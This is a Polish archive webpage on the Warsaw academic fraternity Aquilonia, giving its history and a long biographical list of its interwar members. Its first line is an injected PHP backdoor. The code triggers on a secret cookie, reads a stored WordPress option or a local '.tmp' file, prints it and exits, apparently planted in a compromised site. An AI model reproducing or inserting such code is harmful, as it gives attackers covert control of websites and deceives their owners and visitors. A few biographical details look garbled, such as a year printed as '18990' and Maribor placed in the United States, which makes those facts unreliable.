if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Aquilonia

Dekiel Aquilonii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka Aquilonia
Siedziba:
Warszawa
Data powstania:
4 XI 1921 r.
Barwy:
wiśniowa – biała – błękitna (symbolika barw: miłość Ojczyzny – prawda – stałość)
Dewiza:
„Omnia pro Patria” („Wszystko dla Ojczyzny”)

Rys historyczny

Komers Aquilonii, Warszawa 23 XI 1926 r.

Aquilonia została złożona dnia 4 XI 1921 r. przez grupę absolwentów Gimnazjum im. Jana Zamoyskiego w Warszawie pod nazwą “Orzeł Biały”. W końcu 1921 r. zmieniono nazwę korporacji na “Aquilonia”. Kilka lat później po nawiązaniu kontaktów z członkami powstałej i krótko działającej w 1915 r. tzw. pierwszej Aquilonii, na komersie w dniu 12 II 1925 r. doszło do podpisania aktu unifikacji obu korporacji.

Dnia 23 XII 1921 r. Aquilonia została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 4 XI 1921 r.). Kandydowała pod opieką K! Sarmatia. Prawa członka rzeczywistego uzyskała w 1922 r. (?). Związek Filistrów Aquilonii powołano dnia 14 lutego 1926 r.

Aquilonia, Warszawa 1933 r.

Aquilonia należała do najbardziej aktywnych i znanych korporacji polskich międzywojnia. Była związkiem o wyraźnie narodowym profilu ideowo-wychowawczym. Do jej członków należeli znani działacze obozu narodowego okresu międzywojennego, konspiracji oraz powojennej emigracji.

Przy Aquilonii w Związku Polskich Korporacji Akademickich kandydowały w 1922 r. K! Wandea oraz w 1925 r. K! Audacja.

Aquilonia zawarła cztery kartele: dnia 19 maja 1923 r. z K! Patria (rozwiązany dnia 7 V 1927 r.), dnia 12 II 1925 r. z K! Baltia z Poznania oraz dnia 19 VI 1928 r. z K! Z.A.G. Wisła z Gdańska.

Kuratorem korporacji z ramienia Uniwersytetu byli: prof. Eugeniusz Jarra, prof. Władysław Tatarkiewicz oraz prof. Edward Loth. Siedziba korporacji mieściła się: w latach 1924-26 przy ul. Leszno 23, w latach 1927-1930 przy ul. Smolnej 30, w latach 1930-32 przy ul. Rozbrat 34/36, a w roku akademickim 1932/33 przy ul. Marszałka Foch’a 2.

Całkowita ustalona, niekompletna imienna liczba członków obejmuje 177 nazwisk, w tym ośmiu członków honorowych.

Tablica pamiątkowa Aquilonii, Kościół pw. św. Anny przy Krakowskim Przedmieściu w Warszawie.

W okresie powojennym przez wiele lat odbywały się nieoficjalnie spotkania Aquilonów. Dnia 14 V 1979 r. odsłonięto tablicę pamiątkową w Kościele pw. św. Anny w Warszawie poświęconą poległym, pomordowanym i zmarłym członkom korporacji. W latach 1983-88 wysiłkiem czterech warszawskich korporacji: Aquilonii, Sarmatii, Patrii, Sparty oraz poznańskiej Lechii w wieży przy kościele akademickim pw. św. Anny powstała korporacyjna Kwatera Pamięci. Znalazła się tam między innymi imienna tablica w hołdzie poległym i pomordowanym w czasie wojny Aquilonom. Dnia 5 XI 1994 r. Aquilonia została reaktywowana (www.aquilonia.waw.pl).

Lista członków

Poniższa, niekompletna lista członków Aquilonii obejmuje ponad 175 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Józef Czarkowski, (1871 - 24 luty 1956) ojciec Jerzego (Aquilonia), dr med., Filister honorowy Aquillonii 1923
 2. Aleksander Romuald Jackowski, (1869 - 1949 w Katowicach) s. Aleksandra i Antoniny Sztumpf, prawnik, cywilista, prof. i rektor 1932/32, SGH, senator RP z ramienia Związku Ludowo-Narodowego 1924-27, Filister honorowy Aquilonii 1927, w czasie wojny wykładowca na tajnych kompletach
 3. Eugeniusz Jarra, (1881-1973) prawnik, historyk filozofii prawa i myśli politycznej, prawnik, prof. i dziekan Wydziału Prawa UW, wieloletni kurator a od 1924 Filister honorowy Aquilonii, od wybuchu wojny na emigracji we Francji i Wielkiej Brytanii, wykładowca Uniwersytetu w Paryżu i Oksfordzie, działacz polonijny
 4. Władysław Marchwiński, (1874-1942) s. Felicjana i Joanny z Sumińskich, prawd. ojciec Andrzeja (Aquilonia), inż., Filister honorowy Aquilonii 1925
 5. Jan Suski, (1888 - 22 września 1933) ksiądz, Filister honorowy Aquilonii 1931
 6. Stefan Szczepkowski, Filister honorowy Aquilonii 1923
 7. Antoni Szlagowski, (10 lipca 1864 w Gulczewie - 28 lutego 1956 w Milanówku) studiował w Warszawie, Petersburgu i Rzymie, święcenia kapłańskie 18990, wikariusz w parafiach św. Antoniego i św. Aleksandra w Warszawie, prof. seminarium duchownego, a następnie prof. i dziekan Wydziału Teologicznego oraz 1927/28 rektor UW, duszpasterz młodzieży akademickiej, która nadała mu tytuł Dożywotniego Przyjaciela Polskiej Młodzieży Akademickiej, autor tekstu Ślubowania Jasnogórskiego z 1936, od 1928 Filister honorowy Aquilonii, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, od 1927 infułat, od 1928 biskup tytularny Irenopolis in Cilicia i sufragan warszawski, od 1945 arcybiskup tytularny Cotyaeum, proboszcz parafii św. Apostołów Piotra i Pawła na Koszykach 1928-56, w czasie Powstania Warszawskiego w Warszawie, we wrześniu 1944 internowany w Milanówku, autor licznych prac z zakresu biblistyki, m.in. wydał zmodernizowany przez siebie przekład Biblii Jakuba Wujka 1900
 8. Władysław Tatarkiewicz, (3 kwietnia 1886 w Warszawie - 4 kwietnia 1980 w Warszawie), student prawa, psychologii, filozofii, antropologii, zoologii, historię sztuki) PW, UW, w Berlinie oraz Marburgu, habilitacja UJK 1919, wykładowca UW, USB, UP, filozof i historyk filozofii, estetyk i etyk, historyk sztuki, przedstawiciel tzw. lwowsko-warszawskiej szkoły filozoficznej, członek PAU i PAN, kurator i od 1933 Filister honorowy Aquilonii, po wojnie szykanowany przez władze komunistyczne

Członkowie rzeczywiści

 1. Czesław Andrzejkowicz (Andrzeykowicz-Buttowt), (22 listopada 1905 w Archangielsku w Rosji - 9 kwietnia 1972 we Włocławku) s. Piotra i Konstancji z Krajewskich, absolwent College’u w Morges w Szwajcarii 1924, absolwent Gimnazjum im. Jana Zamoyskiego 1927, student i absolwent prawa UW 1933, student polonistyki UW oraz SNP, c. 1928, akt. 1928-33, wiceolderman sem. zim. 1931/32, olderman sem. let. 1932/33, redaktor “Wiadomości Korporacyjnych”, działacz OWP i ONR, w końcu lat 30-tych sekretarz redakcji “Kuriera Warszawskiego”, ciężko ranny w wojnie obronnej 1939 - inwalida wojenny, po wojnie mieszkał we Włocławku, dziennikarz, literat, poeta (ps. Andrzej Grot), red. naczelny “Życia Włocławka”, prezes Towarzystwa Miłośników Kultury, odznaczony Krzyżem Virtuti Militari, Złotym i Srebrnym Krzyżem Zasługi, pochowany na Cmentarzu we Włocławku
 2. William Beyer, (1909 - 1980) student prawa UW, c. 1928, akt. 1928-31, prawnik, adwokat
 3. Bogusław Dunin-Borkowski, (25 grudnia 1911 - 17 sierpnia 2000 w Warszawie) brat Sławomira (Aquilonia), brat stryjeczny Władysława (Aquilonia), student i absolwent farmacji UW, c. 1932, akt. 1932, prof. farmacji Akademii Medycznej w Poznaniu, członek PAU, PAN, PTPN, autor i współautor ponad 250 prac naukowych, dr honoris causa Akademii Medycznej w Poznaniu, Kawaler Krzyża Komandorskiego OOP
 4. Sławomir Dunin-Borkowski, (3 września 1909 - 6 listopada 1958 w Monachium) brat Bogusława (Aquilonia), brat stryjeczny Władysława (Aquilonia), student prawa UW, od 1932 student WSH, c. 1929, akt. 1929-33, działacz konspiracyjny, pracownik Biura Informacji i Propagandy AK, redaktor pism konspiracyjnych, ppor. w Powstaniu Warszawskim, jeniec oflagu II D Grossborn, po wojnie na emigracji w Wielkiej Brytanii, dziennikarz, literat, od 1952 pracownik Radia Wolna Europa, pochowany na Cmentarzu Nordfriedhof w Monachium, w 2009 jego prochy złożono w grobie rodzinnym na Powązkach w Warszawie
 5. Władysław Dunin-Borkowski, (27 czerwca 1905 - 31 stycznia 1987 w Londynie) brat stryjeczny Bogusława i Sławomira (Aquilonia), student prawa UW, c. 1924, akt. 1924-30, prezes sem. zim. oraz sem. let. 1929/30, prawnik, adwokat, po wojnie na emigracji w Wielkiej Brytanii, działacz emigracyjny
 6. Brunon Franciszek Borucki, (10 października 1903 - 20 grudnia 1974 w Londynie) s. Antoniego Władysława i Franciszki Wrześniewskiej, absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1921, uczestnik wojny polsko-rosyjskiej 1920 w 1 baterii 4 Dywizjonu Artylerii Konnej, student i absolwent 1926 prawa UW, c. 1923, akt. 1923-28, sekretarz 1924, prezes sem. zim. oraz sem. let. 1924/25, działacz OWP, w latach 30-tych starosta skierniewicki i wicestarosta pow. warszawskiego, starosta miejski w Warszawie podczas Powstania Warszawskiego, po wojnie na emigracji w Wielkiej Brytanii, polityk emigracyjny i członek rządu londyńskiego, pochowany na cmentarzu w Gunnersbury

  Henryk Bromke, 1925 r.

 7. Henryk Bromke, (1903-1944) student WSH, c. 1924, akt. 1924-26

 8. Kazimierz Jan Bronic, (28 maja 1908 w Koniuchach w pow. wołkowyskim - 24 września 1978) student WSH, c. 1928, akt. 1928-33, właściciel maj. Koniuchy k. Wołkowyska, pochowany na Cmentarzu w Pomiechowie, odznaczony Srebrnym i Złotym Krzyżem Zasługi oraz Krzyżem Kawalerskim OOP
 9. Ryszard Brylski, (7 luty 1915 w Głuchowie - 1997) student farmacji UW
 10. Witold Chludziński, (9 października 1893 w Warszawie - 19 października 1977 w Kluczborku) s. Stanisława i Bronisławy z d. Wyrwicz, student Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915, żołnierz armii rosyjskiej, a następnie I Korpusu Polskiego gen. Józefa Dowbor-Muśnickiego, w wojnie polsko-rosyjskiej 1919-20 w 4 Pułku Ułanów Zaniemeńskich, po wojnie oficer zawodowy - rtm. WP, w wojnie obronnej 1939 w 6 Dywizji Piechoty, jeniec oflagów 1939-45, odznaczony Virtuti Militari i czterokrotnie Krzyżem Walecznych, pochowany na cmentarzu w Kluczborku
 11. Józef Choinicki (Chojnicki), (8 luty 1906 - 1996), student i absolwent 1934 med. UW, c. 1927
 12. Stanisław Chrzanowski, (1905 - 1953?) student prawa UW, c. 1924, akt. 1924-28, po studiach urzędnik Ministerstwa Rolnictwa
 13. Jan Chwilczyński, (1912 - 29 grudnia 1997 w Warszawie) student farmacji UW
 14. Bolesław Cyruliński, (1903-1944) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1922, student i absolwent 1933 WSH, c. 1924, akt. 1924-29, urzędnik Ministerstwa Skarbu, ppor. rez. 79 Pułku Piechoty, zmarł jako ofiara wojny

  Jerzy Czarkowski, 1925 r.

 15. Jerzy Czarkowski, (30 marca 1902 w Warszawie - 23 sierpnia 1974 w Mariborze w Stanach Zjednoczonych) s. Józefa (Aquilonia), absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie, student prawa UW, c. 1924, akt. 1924-26, prezes sem. let. 1925/26, sekretarz i wiceprezes Naczelnego Komitetu Akademickiego 1925-27, prezes Młodzierzy Wszechpolskiej, adwokat, działacz ONR-ABC, obrońca w procesach politycznych więzień Auschwitz, po wojnie na emigracji w Niemczech i Stanach Zjednoczonych, prezes Związku Narodowego Polaków w Niemczech

 16. Józef Henryk Czyżewski, (1906 - 1973?), student prawa UW, c. 1927, akt. 1927-29, adwokat
 17. Jan Danielecki, (1912 - 2 stycznia 1939) student PW, c. 1931, akt. 1931-33, pchor. rez.
 18. Gustaw Daszkiewicz-Bortnowski, (1907? - 1965) student i absolwent WSH, akt. 1927-28, po wojnie pracownik MSZ, współwłaściciel firmy “Frankopol”
 19. Jerzy Dąbrowski, (1905 - 1984) student WSH, c. 1924, akt. 1924-33
 20. Józef Dąbrowski, (1902-1979) student prawa UW, c. 1924, akt. 1924-26, po wojnie na emigracji w Wielkiej Brytanii

  Adam Doruchowski, ok. 1920 r.

 21. Adam Doruchowski, (3 grudnia 1896 w Mycielinie k. Kalisza - 14 kwietnia 1966 w Katowicach) s. Teodora (Arkonia) i Zofii z d. Górskich, absolwent Gimnazjum w Kaliszu, student i absolwent Kursów Przemysłowo-Rolniczych (SGGW), założyciel i pierwszy prezes Aquilonii 1915, wiceprezes 1915/16, żołnierz I Korpusu Polskiego gen. Józefa Dowbor-Muśnickiego, dowódca szwadronu w 203 Pułku Ułanów, ciężko ranny, ppor. WP, ziemianin, działacz Związku Ziemian, w czasie okupacji pracownik sekcji politycznej ZWZ-AK, po wojnie wywłaszczony z majątku, pracownik PZU, pochowany w Katowicach

 22. Zdzisław Doruchowski, syn Zygmunta (Arkonia), brat stryjeczny Adama (Aquilonia), Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915
 23. Henryk Douglas-Hardy, (1906?-1946) student architektury PW, c. 1927, akt. 1927-33, architekt
 24. Michał Dowbor (Dowbór), (1 stycznia 1896 w Warszawie - 1940 w Katyniu) s. Michała, student i absolwent Kursów Przemysłowo-Rolniczych (SGGW), c. 1915, ochotnik w I Korpusie Polskim gen. Józefa Dowbor-Muśnickiego, uczestnik wojny polsko-rosyjskiej 1920, ppor. rez. broni pancernej, uczestnik wojny obronnej 1939, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 25. Józef Longin Drabich, (15 marca 1901 w Warszawie -2 listopada 1972 w Warszawie) s. Romana Józefa i Apolonii Emilii z d. Dutkowskiej, student i absolwent prawa UW 1919-24, pracował w bankowości, wiosną 1927 rozpoczął aplikację sądową, którą ukończył na początku lat 30-tych, następnie otworzył kancelarię adwokacką w domu rodzinnym przy ul. Wolskiej 107 w Warszawie, działał społecznie, m.in. jako pierwszy sekretarz Związku Filistrów Aquilonii 1926, seketarz zarządu 1927-28, radca prawny zarządu 1932-33, członek komisji własności nieruchomej 1936-37 oraz członek komisji technicznej 1937-38 Towarzystwa Przyjaciół Woli, członek komitetu redakcyjnego publikacji “Wola ongi i dziś. Praca zbiorowa wydana z racji 20-lecia działalności Towarzystwa Przyjaciół Woli w Warszawie” (Warszawa 1938), od 1926 członek PSL “Piast”, a następie Stronnictwa Ludowego (wiceprezes Głównej Komisji Rewizyjnej SL), obrońca w procesach politycznych chłopów oskarżonych o udział w strajkach, wiceprezes Zarządu Powiatowego SL w Mińsku Mazowieckim 1936-37, ustąpił z funkcji “po nieudanym wystąpieniu mającym zapobiec przenikaniu idei komunistycznych” do Stronnictwa, w czasie okupacji w konspiracyjnym Stronnictwie Ludowym “Roch” ps. “Cibor”, ocalał podczas rzezi Woli 4 sierpnia 1944 uciekając z niespełna trzyletnim synem z miejsca egzekucji, po wojnie pracował jako radca prawny Zarządu Stołecznego m.st. Warszawy 1945-50 i Prezydium Wojewódzkiej Rady Narodowej w Warszawie 1950-57, a następnie w Wojewódzkim Przedsiębiorstwie Geodezyjnym 1958-62, Wydawnictwie “Prasa Zjednoczonego Stronnictwa Ludowego” oraz Zakładzie Historii Ruchu Ludowego przy Naczelnym Komitecie ZSL 1965-67, kontynuując działalność polityczną był od 1948 prezesem Stołecznego Zarządu SL oraz m.in. członkiem Rady Naczelnej SL 1946-49 i przewodniczącym Głównego Sądu Partyjnego 1946-48, pochowany na warszawskich Powązkach

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Aleksandra Kopińskiego]

 26. Stanisław Drabiński, (1898 - ) student prawa UW, c. 1924, akt. 1924-26, polonista w Poznaniu
 27. Kazimierz Drecki, (24 marca 1895 w Zofiówce w woj. lubelskim - 1940 w Katyniu) s. Józefa, student i absolwent Kursów Przemysłowo-Rolniczych (SGGW), student Politechniki w Moskwie, c. 1915, żołnierz armii rosyjskiej, następnie ochotnik w I Korpusie Polskim gen. Józefa Dowbor-Muśnickiego, uczestnik wojny polsko-bolszewickiej 1920, ziemianin, por. rez., w wojnie obronnej 1939 w OK II, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony trzykrotnie Krzyżem Walecznych
 28. Władysław Drecki, (1896? - 1918 pod Kaniowem) Kursów Przemysłowo-Rolniczych, c. 1915, zginął pod Kaniowem
 29. Janusz Drzewiecki, (1901-1945?) student prawa UW
 30. Stefan Etienne, (1907-1944) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1925, student i absolwent 1929 prawa UW, akt. 1927-29, sekretarz 1928/29, aplikant adwokacki, poległ w Powstaniu Warszawskim
 31. Janusz Exner, (1900 - ?) brat przyrodni Zdzisława (Arkonia), student prawa UW, założyciel i pierwszy olderman 1921, prawnik, adwokat
 32. Wacław Fachinetti, (1908-1982) student Wydziału Mechanicznego PW, c. 1930, akt. 1930-33
 33. Stanisław Gaczeński, (28 listopada 1908 - 9 września 1941 w Auschwitz) absolwent Gimnazjum im. Św. Stanisława Kostki w Warszawie 1926, student i absolwent 1931 prawa UW, od 1932 student Sorbony Paryż, c. 1927/28, akt. 1927/28-33, kilkukrotny prezes i olderman, m.in. wiceprezes sem. let. 1929/30, olderman sem. zim. 1930/31, prezes sem. zim. 1931/32, członek Zarządu Bratniej Pomocy Studentów UW 1927/28 i 1928/29, członek OWP, w czasie okupacji działacz konspiracyjny w Warszawie, aresztowany przez Gestapo i zesłany do Auschwitz, tam zamordowany
 34. Kazimierz Tadeusz Galiński, (1905 - 18 lipca 1974) prawd. brat Leszka (Aquilonia), student i absolwent rolnictwa SGGW, ochotnik wojny polsko-rosyjskiej 1920, c. 1924, akt. 1924-32, w wojnie obronnej 1939 por. saperów
 35. Leszek Galiński, (1907 - 28 lipca 1928) prawd. brat Kazimierza (Aquilonia), student WSH, c. 1925/26, akt. 1925/26, skarbnik Warszawskiego Koła Międzykorporacyjnego sem. let. 1927/28, pochowany w grobie rodzinnym na warszawskich Powązkach
 36. Stanisław Gawłowski, (1910-1966) student prawa UW, c. 1930/31, akt. 1930/31
 37. Oskar Gierlicz (Gerlicz), student PW, po wojnie na emigracji w Stanach Zjednoczonych
 38. Jan Glinka, (14 listopada 1890 w maj. rodzinnym Stary Susk k. Ostrołęki - 26 marca 1963 w Łowiczu) s. Władysława i Joanny de Colonne, brat stryjeczny Stanisława (Aquilonia), absolwent Gimnazjum Wojciecha Górskiego w Warszawie 1910, student filozofii w Genewie, a następnie agronomii na Uniwersytecie w Lipsku, członek Akademickiego Towarzystwa Rolniczego “Ceres” w Lipsku, student i absolwent Kursów Przemysłowo-Rolniczych (SGGW), c. 1915, drugi prezes 1915/16, ziemianin, działacz społeczny, założyciel Rolniczego Uniwersytetu Ludowego w Ostrołęce, prezes koła wojewódzkiego Związku Monarchistów Polskich, prezes Rady Naczelnej Związku 1927, po wojnie pracował w Archiwum Głównym Akt Dawnych w Warszawie, dr nauk humanistycznych 1961, zajmował się historią Białegostoku i regionu, pochowany na cmentarzu w Nieborowie, odznaczony Złotym Krzyżem Zasługi 1933
 39. Stanisław Glinka, student Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915
 40. Leonard Grabowski, student PW, od 1932 student WSH, c. 1930, akt. 1930-33
 41. Stefan Grabski,
 42. Jerzy Guerquin, (1906 - 10 stycznia 1944 w Warszawie) student i absolwent 1936 Wydziału Mechanicznego PW, c. 1928, akt. 1928-33, członek Straży Narodowej i OWP, skarbnik w zarządzie Związku Akademickich Kół Naukowych 1932-33, pracownik Zbrojowni nr 2 w Warszawie, działacz konspiracyjny, skazany w czasie wojny wyrokiem podziemnego Wojskowego Sądu Specjalnego na karę śmierci, wyrok wykonany przez trzyosobowy patrol bojowy z oddziału DB-18
 43. Leon Gutowski, student Kursów Przemysłowo-Rolniczych, c. 1915

  Aleksander Heinrich, 1931 r. (?).

 44. Aleksander Heinrich, (1901 - 22 maja 1942 w Auschwitz) absolwent Gimnazjum im. Bolesława Prusa w Skierniewicach 1921, student i absolwent 1925 prawa UW, c. 1924, akt. 1924-28, działacz akademicki i narodowy, komendant chorągwi warszawskiej i członek zarządu chorągwi mazowieckiej ZHP; dwukrotny prezes Związku Akademickich Kół Naukowych i Naczelnego Komitetu Akademickiego, jeden z przywódców ONR, dziennikarz, współpracownik “Kuriera Warszawskiego”, członek zarządu Związku Dziennikarzy RP, sekretarz generalny Towarzystwa Ubezpieczeniowego „Prudential”, w czasie wojny działacz konspiracyjny, aresztowany przez Gestapo w 1941, zmarł z wycieńczenia w obozie koncentracyjnym w Auschwitz

 45. Zygmunt Hilkner, (1901 - 1955) student WSH, c. 1928, akt. 1928-32, po wojnie na emigracji w Wielkiej Brytanii
 46. Maciej Roman Hłasko, (1906-1939) student prawa USB, c. 1928, akt. 1928-33
 47. Janusz Holtorp, (1906-1978) student PW, c. 1929, akt. 1929-33, architekt
 48. Jerzy Hordliczka, (1895 - 1932) student Kursów Przemysłowo-Rolniczych, c. 1915
 49. Stanisław Hyżewicz, (20 maja 1903 w Łomiankach - 24 lutego 1966 w Zakopanym) s. Romana i Emilii Kares, absolwent Gimnazjum im. Św. Stanisława Kostki w Warszawie 1923, uczestnik wojny polsko-rosyjskiej w 1 Kompanii Zapasowej Saperów, student i absolwent 1929 prawa UW, c. 1925/26, akt. 1925/26-30, wiceprezes Bratniej Pomocy Studentów UW 1928/29, wiceprezes Ogólnopolskiego Związku Bratnich Pomocy 1929/30, sekretarz generalny Centralnego Związku Kół Naukowych, działacz OWP i ONR, adwokat, w wojnie obronnej 1939, w czasie II wojny światowej więzień Pawiaka i obozów koncentracyjnych Auschwitz, Neuengamme i Dachau, po wojnie na emigracji w Stanach Zjednoczonych, działacz harcerski i polonijny, redaktor i wydawca “Kombatanta”, w 1961 wrócił do Polski, pracował jako adwokat, pochowany na Starych Powązkach (kw. 166)
 50. Janusz Iwicki, (1912 w Warszawie - 8 sierpnia 1944 w Warszawie) s. Zdzisława i Janiny, absolwent Gimnazjum im. Joachima Lelewela w Warszawie 1932, student i absolwent 1936 farmacji UW, początkowo w Sparcie, przeszedł do Aquilonii, po studiach pracował w aptece w Warszawie, aktywny działacz konspiracyjny, ppor. AK, poległ w Powstaniu Warszawskim rozstrzelany przez “Własowców”, pochowany na warszawskich Powązkach (kw. 57)
 51. Juljan Zdzisław Jackowski, (26 września 1904 w Warszawie - 1940 w Katyniu) s. Aleksandra, absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1923, student i absolwent 1930 prawa UW, c. 1924, akt. 1924-30, adwokat, por. rez. kawalerii, w wojnie obronnej 1939 w 26 Pułku Ułanów w Nowogródzkiej Brygadzie Kawalerii, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 52. Tadeusz Jackowski, student WSH, c. 1930/31, akt. 1930/31

  Jan Jacoby, 1994 r.

 53. Jan Jacoby, (1909- 12 września 2003) student WSH, od 1932 student Wyższej Szkoły Dziennikarstwa, c. 1928, akt. 1928-33, absolwent WSD 1935, uczestnik wojny obronnej 1939, prof. Wyższej Szkoły Filmowej, Teatralnej i Telewizyjnej w Łodzi, światowej sławy reżyser filmu naukowego, Prezes Koła Filistrów Aquilonii 1962-2003, Prezes Honorowy Aquilonii, członek Komisji Rewizyjnej 1995-97 i 2001-03 oraz przewodniczący Komisji Rewizyjnej 1997-1999 i 1999-2001 Stowarzyszenia Filistrów Polskich Korporacji Akademickich, odznaczony Dyplomem Honorowym i Złotą Odznaką ZPKA, pochowany na Cmentarzu Powązkowskim w Warszawie

  Zygmunt Jacoby, 1926 r.

 54. Zygmunt Jacoby, (30 marca 1904 w Rakowie k. Częstochowy - 1 marca 1941 w Oranienburgu) s. Józefa i Zofii z Witwickich, brat Jana (Aquilonia), absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1923, student i absolwent 1928 prawa UW, c. 1923, akt. 1923-29, wiceprezes sem. let. 1925/26, prezes i olderman, przewodniczący Komisji Rewizyjnej ZPKA, redaktor dodatku “Korporant” w “Akademiku Polskim” oraz “Wiadomości Korporacyjnych”, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, członek Zarządu Bratniej Pomocy Studentów UW, adwokat, inicjator i pierwszy prezes Koła Wychowanków Gimnazjum im. Jana Zamoyskiego w Warszawie 1930-36, działacz Stronnictwa Narodowego na Podlasiu, w czasie okupacji aresztowany przez Gestapo, zesłany do obozu koncentracyjnego w Oranienburgu, tam zamordowany, jego symboliczny grób znajduje się na Starych Powązkach w Warszawie (kw. 24)

 55. Kazimierz Jagowd, (1911 - 1987) student UW, c. 1930, akt. 1930/31-33, żołnierz 2 Korpusu PSZ na Zachodzie, po wojnie na emigracji we Włoszech
 56. Józef Jarecki, (1912 - ) student UW i SGGW

  Zygmunt Jarmicki, 1969 r.

 57. Wincenty Zygmunt Jarmicki, (5 kwietnia 1909 w Łodzi - 12 października 1982 w Toronto) s. Władysława i Stanisławy z d. Winkler, student i absolwent 1934 Wydziału Mechanicznego PW, c. 1930, akt. 1930-33, wiceolderman sem. zim. 1932/33, po studiach pracownik Państwowych Zakładów Lotniczych w Paluchach k. Warszawy, m.in. w 1939 odpowiedzialny za instalacja silników i systemu paliwowego bombowca P-37 “Łoś”, w 1939 przedostał się do Francji, a po jej zajęciu przez Hiszpanię i Brazylię do Kanady, pracownik The DeHavilland Aircraft Canada Ltd. w Toronto 1941-45, po wojnie pozostał na emigracji w Kanadzie, pracownik Dominion Magnesium Ltd. 1945-72 oraz Departament of Supply and Services w Ottawie 1972-74, na emeryturze administrator Copernicus Lodge w Toronto 1974-82, członek-założyciel Stowarzyszenia Techników Polskich w Kanadzie, prezes Zarządu Głównego Kongresu Polonii Kanadyjskiej 1966-70, prezes honorowy Kongresu Polonii Kanadyjskiej, pochowany na Cmentarzu Mount Hope

 58. Michał Jodkowski, (1911 - 1945?) absolwent Gimnazjum im. Adama Mickiewicza w Grodnie 1932, student prawa UW, zginął w czasie wojny na froncie zachodnim
 59. Ryszard Kaczyński, (29 października 1902 w Warszawie - 1981) student i absolwent 1930 med. UW, c. 1924, akt. 1924-31, internista
 60. Zygmunt Kaczyński, student farmacji UW
 61. Kazimierz Kalinowski, (1909 - 25 grudnia 1992) student prawa UW, c. 1927, akt. 1927-33, olderman sem. zim. 1932/33, sportowiec i działacz sportowy, adwokat
 62. Tadeusz Kamieński, (1910 - 10 sierpnia 1997 w Olney w Wielkiej Brytanii) student WSH, c. 1928, akt. 1928-32, sekretarz sem. zim. 1930/31, student Polskiego Uniwersytetu w Londynie, po wojnie na emigracji w Wielkiej Brytanii, mgr filologii
 63. Jan Kawiecki, (1907 - ) student prawa UW, c. 1925/26, akt. 1925/26-32, sekretarz sem. let. 1928/29, więzień Berezy, w wojnie obronnej 1939 obrońca Modlina, w czasie okupacji w AK, skazany na śmierć w 1946, zwolniony na mocy amnestii, po wojnie na emigracji w Kanadzie
 64. Edward Marcin Kemnitz, (10 października 1907 w Berlinie - 10 marca 2002 w Kanadzie) student i absolwent prawa UW, c. 1927, akt. 1927-33, członek OWP, ONR-ABC, żołnierz Związku Jaszczurczego, NSZ, AK i “Żegoty”, ostatni dowódca Okręgu Pomorze NSZ, za działalność w “Żegocie” odznaczony medalem i tytułem Sprawiedliwy Wśród Narodów Świata, w 1945 aresztowany i skazany na 12 lat więzienia, osadzony w więzieniu we Wronkach, zwolniony 1956, z powodu szykan UB wyemigrował w 1964 do Kanady, działacz polonijny, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, w 2001 awansowany na stopień podpułkownika, autor wydanych na prawach rękopisu w Londynie “Wspomnień z pracy politycznej i społecznej w latach 1923-56″
 65. Władysław Kempfi, (18 czerwca 1903 - 23 kwietnia 1981 w Warszawie) s. Feliksa i Józefy Królikowskiej, absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1922, w wojnie polsko-rosyjskiej 1920 w 8 Dywizjonie Artylerii Konnej, student i absolwent 1927 prawa UW, c. 1923, akt. 1923-26, sekretarz sem. zim. 1924/25, wiceprezes sem. let. 1924/25, ostatni przed wojną prezes Związku Filistrów 1938/39, działacz akademicki, dwukrotny prezes Bratniej Pomocy Studentów UW 1927-29, prezes Ogólnopolskiego Związku Bratnich Pomocy 1928-29, wiceprezes Naczelnego Komitetu Akademickiego, działacz MW, OWP i ONR, po studiach adwokat, oficer rez., w wojnie obronnej 1939 w 26 Pułku Piechoty Legii Akademickiej, więzień Pawiaka i obozów koncentracyjnych Sachsenhausen i Mauthausen-Gusen, współpracownik Delegatury Rządu na Kraj, po wojnie adwokat, inicjator wmurowania tablicy pamiątkowej Aquilonii w Kościele pw. Św. Anny w Warszawie, pochowany na Starych Powązkach (kw. 247)
 66. Jerzy Daniel Kędzierski, (3 stycznia 1902 - 29 maja 1981 w Warszawie) brat Tomasza (Aquilonia), absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1921, uczestnik wojny polsko-rosyjskiej 1920, student i absolwent architektury PW, c. 1924, akt. 1924-33, uczestnik wojny obronnej 1939, w konspiracji kpt. AK ps. Kalinowski”, dowódca kompanii “Supraśl” w Batalionie im. Łukasińskiego, bohater Powstania Warszawskiego - dowódca Reduty i Pałacu Krasińskich, dwukrotnie ranny, odznaczony Krzyżem Virtuti Militari i dwukrotnie Krzyżem Walecznych, jeniec obozu jenieckiego Muranu, po wojnie kierował odbudową Szczecina, więzień polityczny 1949-53, później architekt Warszawy, Łodzi i Starachowic, pochowany na Starych Powązkach w Warszawie (kw. 237)
 67. Tomasz Jan Kędzierski, (1900-1990) brat Jerzego (Aquilonia), uczestnik walk o niepodległość 1918-20, student prawa UW, c. 1924, akt. 1924-26, adwokat, uczestnik wojny obronnej 1939
